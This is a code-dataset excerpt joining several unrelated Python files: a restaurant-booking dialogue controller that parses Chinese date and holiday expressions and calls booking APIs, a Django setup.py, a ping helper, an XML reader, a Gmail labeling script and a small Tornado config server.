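# 'minute_enable' means the utterance carried explicit minutes; it is flipped to 'minute_disable' below when TDE returns no minute field\n 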
minute = 'minute_enable'\n try:\n if 'minute' not in r_obj['informs'][0]['value']['chrono']['time']['items'][0]:\n minute = 'minute_disable'\n hour = r_obj['informs'][0]['value']['chrono']['time']['items'][0]['hour']\n except:\n hour = None\n LOG.error('failed to parse an hour from exact_hour')\n return hour, minute\n \ndef get_datetime(datetime_str):\n # Get the actual datetime, e.g. yyyy-mm-dd hh:mm:ss\n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(datetime_str),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json() \n # error_msg = 'API invocation fail,url:%s, status_code:%s, response:%s'\\\n # % (constants.TDE_URL, r.status_code, r.text)\n # LOG.error(error_msg)\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try:\n dt = parse(r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['single'])\n except:\n dt = None\n LOG.error('failed to parse a date from exact_date')\n return dt\n \ndef MotherDay():\n # Mother's Day falls on the second Sunday of May; derive it from the weekday of May 1st\n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(u'五月一號'),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n dt = parse(r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['single'])\n weekDay = r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['weekDay']\n if weekDay == 'MONDAY':\n dt += timedelta(days=13)\n elif weekDay == 'TUESDAY':\n dt += timedelta(days=12)\n elif weekDay == 'WEDNESDAY':\n dt += timedelta(days=11)\n elif weekDay == 'THURSDAY':\n dt += timedelta(days=10)\n elif weekDay == 'FRIDAY':\n dt += timedelta(days=9)\n elif weekDay == 'SATURDAY':\n dt += timedelta(days=8)\n elif weekDay == 'SUNDAY':\n dt += timedelta(days=7)\n return dt\n\ndef search_holiday(holiday_str):\n hdt = datetime.strptime(\"1900-01-01\", '%Y-%m-%d')\n if holiday_str == u'父亲节':\n hdt = datetime.strptime(\"1900-08-08\", '%Y-%m-%d')\n elif holiday_str == u'母亲节':\n hdt = MotherDay()\n elif holiday_str == u'儿童节':\n hdt = datetime.strptime(\"1900-04-04\", '%Y-%m-%d')\n elif holiday_str == u\"国庆日\":\n hdt = datetime.strptime(\"1900-10-10\", '%Y-%m-%d')\n elif holiday_str == u\"二二八\":\n hdt = datetime.strptime(\"1900-2-28\", '%Y-%m-%d')\n elif holiday_str == u\"初一\":\n hdt = get_datetime(u'农历一月一日')\n elif holiday_str == u\"初二\":\n hdt = get_datetime(u'农历一月二日')\n elif holiday_str == u\"初三\":\n hdt = get_datetime(u'农历一月三日')\n elif holiday_str == u\"初四\":\n hdt = get_datetime(u'农历一月四日')\n elif holiday_str == u\"初五\":\n hdt = get_datetime(u'农历一月五日')\n elif holiday_str == u\"七夕情人节\":\n hdt = get_datetime(u'七夕')\n elif holiday_str == u'情人节':\n LunarValentineDay = 
get_datetime(u'七夕')\n ValentineDay = get_datetime(u'情人节')\n Today = get_datetime(u'今天')\n if (ValentineDay - Today) > (LunarValentineDay - Today):\n hdt = LunarValentineDay\n else:\n hdt = ValentineDay\n else:\n hdt = get_datetime(holiday_str)\n return hdt\n\nclass InlineStartBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n LOG.debug('In StartBooking, data received from TE: %s' % json.dumps(json_from_request, ensure_ascii=False, indent=4))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n task_info = json_from_request['task_info']\n from_sip = task_info.get('from_sip', '')\n caller_id = task_info.get('caller_id', '')\n uuid = task_info.get('meta_uuid', '')\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"from_sip\": from_sip,\n \"caller_id\": caller_id,\n \"uuid\": uuid,\n }\n }\n url = constants.SYSTEX_URL+'inline/startBooking'\n LOG.debug('request inline start booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n ret = encapsule_rtn_format(r_obj[\"msg_response\"][\"update\"], None)\n return Response(json.dumps(ret), status=200)\n\n\nclass InlineDoBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n task_info = json_from_request['task_info']\n te_payload = {\n \"user_id\": json_from_request['user_id'],\n \"text\": json_from_request['text'],\n \"task_info\": {\n \"from_sip\": task_info.get('from_sip', None),\n \"caller_id\": task_info.get('caller_id', None), \n \"restaurant_id\": task_info.get('restaurant_id', None),\n \"time_date\": task_info.get('time_date', None),\n \"time_time\": task_info.get('time_time', None),\n \"seat_num\": task_info.get('seat_num', None),\n \"kid_num\": task_info.get('seat_num_children', None),\n \"chair_num\": task_info.get('chair_num', None), # if \"chair_num\" in task_info else 0\n \"lastname\": task_info.get('lastname', None),\n \"phone\": task_info.get('phone', None),\n \"note\": task_info.get('note', None),\n \"uuid\": task_info.get('meta_uuid', None),\n }\n }\n LOG.debug('In doBooking, data received from TE: %s' % json.dumps(te_payload, ensure_ascii=False, indent=4))\n # TODO: Why are te_payload and payload built as two separate dicts? Consolidate them when there is time.\n task_info = te_payload['task_info']\n payload = {\n \"user_id\": te_payload['user_id'],\n \"text\": te_payload['text'],\n \"task_info\": {\n \"from_sip\": task_info['from_sip'] if task_info['from_sip'] is not None else '',\n \"caller_id\": task_info['caller_id'] if task_info['caller_id'] is not None else '', \n \"restaurant_id\": task_info['restaurant_id'] if task_info['restaurant_id'] is not None else '',\n \"date\": task_info['time_date'] if task_info['time_date'] is not None else '',\n \"time\": task_info['time_time'] if task_info['time_time'] is not None else '',\n \"group_num\": int(task_info['seat_num']) if task_info['seat_num'] is not None else 0,\n \"kid_num\": int(task_info['kid_num']) if task_info['kid_num'] is not None and task_info['kid_num'] != \"null\" else 0,\n \"chair_num\": int(get_num(task_info['chair_num'])) if task_info['chair_num'] is not None and task_info['chair_num'] != \"seat_num_children\" else 0,\n \"lastname\": task_info['lastname'] if 
task_info['lastname'] is not None else '',\n \"phone\": get_phone_num(task_info['phone']) if task_info['phone'] is not None else '',\n \"note\": task_info['note'] if task_info['note'] is not None else '',\n \"uuid\": task_info['uuid'] if task_info['uuid'] is not None else '',\n }\n }\n # If the user answers \"all of them\" when asked about baby chairs, the chair count equals the number of children\n if task_info['chair_num'] == \"seat_num_children\":\n payload['task_info']['chair_num'] = int(get_num(task_info['kid_num']))\n url = constants.SYSTEX_URL+'inline/doBooking'\n LOG.debug('request inline do booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n update_kv_map = r_obj[\"msg_response\"][\"update\"]\n # Assign 0 to chair_num if user doesn't want any baby chair\n if 'chair_num' not in json_from_request['task_info']:\n update_kv_map['chair_num'] = '0' \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass InlineEndBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n task_info = json_from_request['task_info']\n from_sip = task_info.get('from_sip', '')\n caller_id = task_info.get('caller_id', '')\n phone = task_info.get('phone', '')\n uuid = task_info.get('meta_uuid', '')\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"from_sip\": from_sip,\n \"caller_id\": caller_id,\n \"end_status\": task_info['end_status'],\n \"phone\": phone,\n \"uuid\": uuid,\n }\n }\n url = constants.SYSTEX_URL+'inline/endBooking'\n LOG.debug('request inline end booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n \n # ret = encapsule_rtn_format(r_obj[\"msg_response\"], None)\n # return Response(json.dumps(ret), status=200)\n\nclass ListRequerements(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n restaurant_id = json_from_request['task_info']['restaurant_id']\n \n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"restaurant_id\": restaurant_id\n }\n }\n r = requests.post(constants.SYSTEX_URL+'restaurant/qryRestaurantOpts', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n ret = encapsule_rtn_format(r_obj[\"msg_response\"][\"update\"], None)\n return Response(json.dumps(ret), status=200)\n\nclass UpdateRequerements(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n booking_id = json_from_request['task_info']['booking_id']\n\n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"id\": booking_id\n }\n }\n for i in range(1,4):\n if 'opt'+str(i)+'_yn' in json_from_request['task_info']:\n 
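# normalize the dialogue engine's yes/no answers to the Y/N codes the booking backend expects\n 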
payload['task_info']['opt'+str(i)+'_yn'] = json_from_request['task_info']['opt'+str(i)+'_yn'].replace('yes', 'Y').replace('no', 'N')\n if 'opt'+str(i)+'_num' in json_from_request['task_info']:\n payload['task_info']['opt'+str(i)+'_num'] = json_from_request['task_info']['opt'+str(i)+'_num']\n r = requests.post(constants.SYSTEX_URL+'booking/updBookingOpts', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n ret = encapsule_rtn_format({}, None)\n return Response(json.dumps(ret), status=200)\n\nclass EditReserveOrder(Resource):\n def post(self):\n update_kv_map = {\n \"status\": \"succeed\"\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass CancelReserveOrder(Resource):\n def post(self):\n update_kv_map = {\n \"status\": \"succeed\"\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ListMoreOptions(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n if 'more_opts_order' not in json_from_request['task_info']:\n update_kv_map = {\n \"more_opts\": u\"明天晚上六点或是明天晚上八点\",\n \"more_opts_order\": 1\n }\n elif json_from_request['task_info']['more_opts_order'] == 1:\n update_kv_map = {\n \"more_opts\": u\"后天或是大后天\",\n \"more_opts_order\": 2\n }\n elif json_from_request['task_info']['more_opts_order'] == 2:\n update_kv_map = {\n \"more_opts\": u\"南京东路店或是中山店\",\n \"more_opts_order\": 3\n }\n else:\n update_kv_map = {\n \"more_opts_order\": -1\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass SearchReserveOrderBySeriesNumber(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n series_number = json_from_request['task_info']['series_number']\n update_kv_map = None\n if series_number == u'AABB28825252':\n update_kv_map = {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-19 19:00:00\",\n \"seat_num\": 5\n }\n else:\n pass\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass SearchReserveOrderByPhone(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n phone = json_from_request['task_info']['phone']\n update_kv_map = None\n if phone == u'0912345678':\n update_kv_map = {\n \"order_list\": [\n {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-19 19:00:00\",\n \"seat_num\": 5,\n \"series_number\": \"AABB28825252\"\n }\n ]\n }\n elif phone == u'0912345677':\n update_kv_map = {\n \"order_list\": [\n {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-20 19:00:00\",\n \"seat_num\": 3,\n \"series_number\": \"AABB28825253\"\n },\n {\n \"restaurant\": u\"西堤牛排\",\n \"time\": \"2018-03-28 19:00:00\",\n \"seat_num\": 4,\n \"series_number\": \"AABB28825254\"\n }\n ]\n }\n else:\n pass\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ConvertParamsNLU1(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n LOG.info(json.dumps(json_from_request['task_info'], ensure_ascii=False))\n date_time = json_from_request['task_info'][u'用餐时间_utc']\n seat_num_total = json_from_request['task_info'][u'人数_raw']['total']\n restaurant = json_from_request['task_info'][u'餐厅']\n\n dt = parse(date_time)\n\n update_kv_map = {\n \"restaurant\": restaurant,\n \"time_date\": dt.strftime(\"%Y%m%d\"),\n \"time_time\": dt.strftime(\"%H:%M\"),\n 
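# time_str spells the date with Chinese unit characters: 年=year, 月=month, 日=day, 点=o'clock, 分=minute\n 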
\"time_str\": dt.strftime(\"%Y年%m月%d日%H点%M分\"),\n \"seat_num_total\": seat_num_total\n }\n \n if 'adult' in json_from_request['task_info'][u'人数_raw']:\n update_kv_map['seat_num'] = json_from_request['task_info'][u'人数_raw']['adult']\n if 'child' in json_from_request['task_info'][u'人数_raw']:\n update_kv_map['seat_num_children'] = json_from_request['task_info'][u'人数_raw']['child']\n\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ConvertParamsNLU2(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ConvertParamsNLU2, data received from TE: %s' % json.dumps(json_from_request['task_info'], ensure_ascii=False, indent=4))\n\n # parser time\n exact_date = json_from_request['task_info']['exact_date']\n exact_hour = json_from_request['task_info']['exact_hour']\n exact_minute = json_from_request['task_info']['exact_minute']\n time_time = \"{hour}:{minute}\".format(hour = exact_hour,minute = exact_minute)\n\n # parse exact date\n dt = get_datetime(exact_date)\n exact_hour = int(get_num(exact_hour))\n exact_minute = int(get_num(exact_minute))\n\n LOG.info('hour:'+str(exact_hour)+' minute:'+str(exact_minute))\n dt = dt.replace(hour=exact_hour, minute=exact_minute)\n \n update_kv_map = {\"time_time\": time_time}\n if exact_minute > 0 :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}%M{m}\").format(M='月', d='日', h='點', m='分')\n else :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}\").format(M='月', d='日', h='點')\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\n\nclass ConvertParams(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ConvertParams, data received from TE: %s' % json.dumps(json_from_request['task_info'], ensure_ascii=False, indent=4))\n\n remove_kv_map = {}\n update_kv_map = {}\n\n # parse seat number\n if 'seat_num' not in json_from_request['task_info']:\n seat_num_total = 0\n else:\n seat_num = get_num(json_from_request['task_info']['seat_num'])\n update_kv_map[\"seat_num\"] = seat_num\n seat_num_total = seat_num\n \n # parse children seat number and chair number\n seat_num_children = 0\n if 'seat_num_children' in json_from_request['task_info'] and json_from_request['task_info']['seat_num_children'] != \"null\":\n seat_num_children = get_num(json_from_request['task_info']['seat_num_children'])\n seat_num_total = int(seat_num_total) + int(seat_num_children)\n\n # parser date\n exact_date = json_from_request['task_info']['exact_date']\n exact_hour = json_from_request['task_info']['exact_hour']\n\n exact_minute = '0'\n \n if 'exact_minute' in json_from_request['task_info']:\n exact_minute = json_from_request['task_info']['exact_minute']\n if exact_minute == u'半':\n exact_minute = '30'\n\n # parse exact date\n if 'holiday' in json_from_request['task_info']:\n dt = search_holiday(json_from_request['task_info']['holiday'])\n else:\n dt = get_datetime(exact_date)\n \n time_judge = re.compile(u'(早|晚|凌晨|上午|中午|下午|晚上)').search(exact_hour)\n if time_judge is not None:\n time_judge = time_judge.group(1)\n\n exact_hour, minute = get_hourtime(exact_hour)\n if minute == 'minute_disable':\n exact_minute = '0'\n\n # opening hours from 9am to 10pm \n\n if time_judge in [u'晚',u'中午',u'下午',u'晚上']:\n if exact_hour < 12:\n 
exact_hour += 12\n\n if exact_hour < 10:\n exact_hour += 12\n elif exact_hour > 22:\n exact_hour -= 12\n\n exact_minute = get_num(exact_minute)\n\n # LOG.info('hour:'+str(exact_hour)+' minute:'+str(exact_minute))\n remove_kv_map = {}\n if dt is None:\n update_kv_map[\"exact_minute\"] = exact_minute\n update_kv_map[\"seat_num_total\"] = seat_num_total\n remove_kv_map['time_str'] = None\n \n else:\n dt = dt.replace(hour=exact_hour, minute=int(exact_minute))\n update_kv_map[\"time_date\"] = dt.strftime(\"%Y%m%d\")\n update_kv_map[\"time_time\"] = dt.strftime(\"%H:%M\")\n update_kv_map[\"exact_minute\"] = exact_minute\n update_kv_map[\"seat_num_total\"] = seat_num_total\n # omit the minutes from the date string when they are zero\n if int(exact_minute) > 0:\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}%M{m}\").format(M='月', d='日', h='點', m='分')\n else:\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}\").format(M='月', d='日', h='點')\n \n if seat_num_children != 0:\n update_kv_map['seat_num_children'] = seat_num_children\n\n remove_kv_map['holiday'] = None\n ret = encapsule_rtn_format(update_kv_map, remove_kv_map)\n return Response(json.dumps(ret), status=200)\n\nclass SearchRestaurant(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n\n text = json_from_request['text']\n date = json_from_request['task_info']['time_date']\n time = json_from_request['task_info']['time_time']\n seat_num_total = json_from_request['task_info']['seat_num_total']\n restaurant = json_from_request['task_info']['restaurant']\n\n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"date\": date,\n \"time\": time,\n \"seat_num\": seat_num_total,\n \"restaurant_name\": restaurant\n }\n }\n r = requests.post(constants.SYSTEX_URL+'booking/searchBooking', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n # response\n update_kv_map = {}\n booking_status = \"no_seat\"\n if r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '0':\n booking_status = \"available\"\n elif r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '1':\n booking_status = \"waiting_list\"\n update_kv_map[\"waiting_order\"] = r_obj[\"msg_response\"][\"update\"][\"waiting_order\"]\n update_kv_map[\"restaurant_id\"] = r_obj[\"msg_response\"][\"update\"][\"restaurant_id\"]\n update_kv_map[\"booking_status\"] = booking_status\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass BookRestaurant(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n date = json_from_request['task_info']['time_date']\n time = json_from_request['task_info']['time_time']\n restaurant_id = json_from_request['task_info']['restaurant_id']\n seat_num_total = json_from_request['task_info']['seat_num_total']\n lastname = json_from_request['task_info']['lastname']\n phone = json_from_request['task_info']['phone']\n \n # request\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"date\": date,\n \"time\": time,\n \"restaurant_id\": restaurant_id,\n \"seat_num\": seat_num_total,\n \"lastname\": lastname,\n \"phone\": phone\n }\n }\n r = 
requests.post(constants.SYSTEX_URL+'booking/doBooking', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n \n # response\n update_kv_map = {}\n booking_status = \"no_seat\"\n if r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '0':\n booking_status = \"available\"\n elif r_obj[\"msg_response\"][\"update\"][\"booking_status\"] == '1':\n booking_status = \"waiting_list\"\n update_kv_map[\"waiting_order\"] = r_obj[\"msg_response\"][\"update\"][\"waiting_order\"]\n update_kv_map[\"restaurant_id\"] = r_obj[\"msg_response\"][\"update\"][\"restaurant_id\"]\n update_kv_map[\"booking_status\"] = booking_status\n update_kv_map[\"booking_id\"] = r_obj[\"msg_response\"][\"update\"][\"id\"]\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ResetParams(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ResetParams, data received from TE: %s' % json.dumps(json_from_request, ensure_ascii=False, indent=4))\n\n task_info = json_from_request['task_info']\n LOG.info(json.dumps(task_info, ensure_ascii=False))\n remove_kv_map = {}\n if 'seat_num' not in task_info:\n remove_kv_map[\"seat_num_children\"] = None\n if 'phone' not in task_info:\n remove_kv_map[\"phone\"] = None\n if 'lastname' not in task_info:\n remove_kv_map[\"lastname\"] = None\n if 'time_str' not in task_info:\n remove_kv_map[\"exact_date\"] = None\n remove_kv_map[\"exact_hour\"] = None\n remove_kv_map[\"exact_minute\"] = None\n ret = encapsule_rtn_format(None, remove_kv_map)\n return Response(json.dumps(ret), status=200)\n \n","sub_path":"book_restaurant/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":32007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91516286","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport django_social_launch\n\npackage_name = 'django_social_launch'\ntest_package_name = '%s_test_project' % package_name\n\nEXCLUDE_FROM_PACKAGES = ['%s*' % test_package_name]\n\ndef runtests():\n import os\n import sys\n \n import django\n from django.core.management import call_command\n \n os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % test_package_name\n django.setup()\n call_command('test')\n sys.exit()\n\nsetup(name='django-social-launch',\n version=django_social_launch.__version__,\n description=\"Social sign up page for Django.\",\n author='Seán Hayes',\n author_email='sean@seanhayes.name',\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Framework :: Django\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Internet :: WWW/HTTP :: Site Management\",\n \"Topic :: Software Development :: Libraries\",\n \"Topic :: Software Development :: Libraries :: Python Modules\"\n ],\n keywords='django social sign up referrer',\n url='http://seanhayes.name/',\n download_url='https://github.com/SeanHayes/django-social-launch',\n license='GPL',\n packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),\n include_package_data=True,\n install_requires=['Django>=1.7', 'python-social-auth',],\n 
test_suite='setup.runtests',\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360995564","text":"\r\n\r\nimport os\r\ndef isup(ip):\r\n if os.system(f\"ping {ip} > NUL\") == 0:\r\n status = True\r\n else:\r\n status = False\r\n return status\r\n\r\n\r\n\r\nimport subprocess\r\n\r\ndef isup1(ip):\r\n exitcode=subprocess.call([\"ping\",\"-n\",\"1\",ip],stdout=subprocess.PIPE)\r\n if exitcode == 0:\r\n status = True\r\n else:\r\n status = False\r\n return status\r\n\r\ndef isup2(ip):\r\n return not subprocess.call([\"ping\",\"-n\",\"1\",ip],stdout=subprocess.PIPE)\r\n \r\n","sub_path":"mymodule.py","file_name":"mymodule.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42170836","text":"\nfrom lxml import etree\nlist_data = []\n\nwith open('./xml_file.xml', 'rb') as xmlf:\n tree = etree.parse(xmlf)\n root = tree.getroot()\n for i in root:\n data = {} # a fresh dict for each record so that list entries stay independent\n for a in i:\n data[a.tag] = a.text\n list_data.append(data)\n\nfor item in list_data:\n for i in item:\n print(str(i) + ' ' + str(item[i]))\n print('-----------------------')\n\nwith open('./out_xml.xml', 'wb') as xmlout:\n root = etree.Element('books')\n for book in list_data:\n element = etree.SubElement(root, 'book')\n for key, value in book.items():\n child = etree.SubElement(element, key)\n child.text = value\n et = etree.ElementTree(root)\n et.write(xmlout, xml_declaration=True, encoding='utf-8', pretty_print=True)\n\n\n\n\n","sub_path":"studying/xml_reader/main_xml_reader.py","file_name":"main_xml_reader.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627163729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 16:35:07 2021\n\n@author: neo\n\"\"\"\n\nimport argparse\nfrom simplegmail import Gmail\nfrom simplegmail.query import construct_query\n\nimport _pickle as cPickle\n\n# parsing arguments --------------------------------------------------------------------\n\nparser = argparse.ArgumentParser(description='Email Labeler')\nparser.add_argument(\"--older\", default = 1, help = \"emails older than the supplied number of days are scanned (default is 1)\")\nparser.add_argument(\"--newer\", default = 120, help = \"emails newer than the supplied number of days are scanned (default is 120)\")\nparser.add_argument(\"--cred\", default = \"credentials.json\", help = \"name of the gmail credentials file (default is 'credentials.json')\")\nparser.add_argument(\"--label\", default = \"applications\", help = \"emails recognized as application receipts are categorized under this label in gmail\")\nargs = parser.parse_args()\n\n# print(args)\n\n# user-defined variables ----------------------------------------------------------------\n\nlabel_name = args.label\nemails_older_than = args.older # days\nemails_newer_than = args.newer # days\ncredentials_file = args.cred\n\n#----------------------------------------------------------------------------------------\n\n# initiate gmail API\ngmail = Gmail(client_secret_file = \"gmail_credentials/\" + credentials_file)\n\n\n# get all labels in your gmail account \n\nlabels = gmail.list_labels()\n\n\napplication_label = list(filter(lambda x: x.name == label_name, labels))[0]\n\n\n# sample query 
---------------\n\n# query_params = {\n# \"newer_than\": (2, \"day\"),\n# \"unread\": True,\n# \"labels\":[[\"Work\"], [\"Homework\", \"CS\"]]\n# }\n\n# query to find emails\nquery_params = {\n \"older_than\": (emails_older_than, \"day\"),\n \"newer_than\": (emails_newer_than, \"day\")\n}\n\n# get emails matching the query\nmessages = gmail.get_messages(query=construct_query(query_params))\n\nprint(\"Messages Collected...........................................\")\n\n\npath = \"pickles/\"\n\n# loading vectorizer and feature selector\nvectorizer_file = path + \"vectorizer.pkl\"\nvectorizer_file_handler = open(vectorizer_file, \"rb\")\nvectorizer = cPickle.load(vectorizer_file_handler)\nvectorizer_file_handler.close()\n\nselector_file = path + \"selector.pkl\"\nselector_file_handler = open(selector_file, \"rb\")\nselector = cPickle.load(selector_file_handler)\nselector_file_handler.close()\n\n# load classifier\nclassifier_file = path + \"classifier.pkl\"\nclf_file_handler = open(classifier_file, \"rb\")\nclf = cPickle.load(clf_file_handler)\nclf_file_handler.close()\n\nfor m in messages:\n sub = ''.join(e for e in m.subject if e.isalnum() or e == ' ' and e != '-')\n features_test_transformed = vectorizer.transform([sub])\n features_test = selector.transform(features_test_transformed).toarray()\n pred = clf.predict(features_test)\n \n if pred[0] == 1:\n # print(clf.predict_proba(features_test))\n m.add_label(application_label)\n \nprint(\"Labelling complete...........................................\")\n\nexit()\n \n \n\n\n\n\n\n","sub_path":"labeler.py","file_name":"labeler.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69979873","text":"from tornado import template\nimport tornado.ioloop\nimport tornado.web\nimport json\nfrom datetime import datetime\n\n\nclass MyFormHandler(tornado.web.RequestHandler):\n \n def get(self, loc):\n if loc == 'gui':\n self.render(\"base.html\", message=None)\n else:\n config_file = open('config.json')\n res = json.loads(config_file.read())\n config_file.close()\n self.write(res)\n \n def post(self, loc):\n text = self.get_body_argument(\"config\")\n with open('config.json', 'w') as outfile:\n json.dump(text, outfile)\n now = datetime.now()\n self.render(\"base.html\",\n message=\"Updated at {}\".format(now.strftime(\"%H:%M:%S\")))\n\n\nif __name__ == \"__main__\":\n application = tornado.web.Application([\n (r\"/(esp32)\", MyFormHandler),\n (r\"/(gui)\", MyFormHandler),\n (r\"/(.*)\", tornado.web.StaticFileHandler, {'path': '.',\n 'default_filename': 'config.json'}),\n ], autoreload=True, static_hash_cache=False)\n application.listen(8888)\n 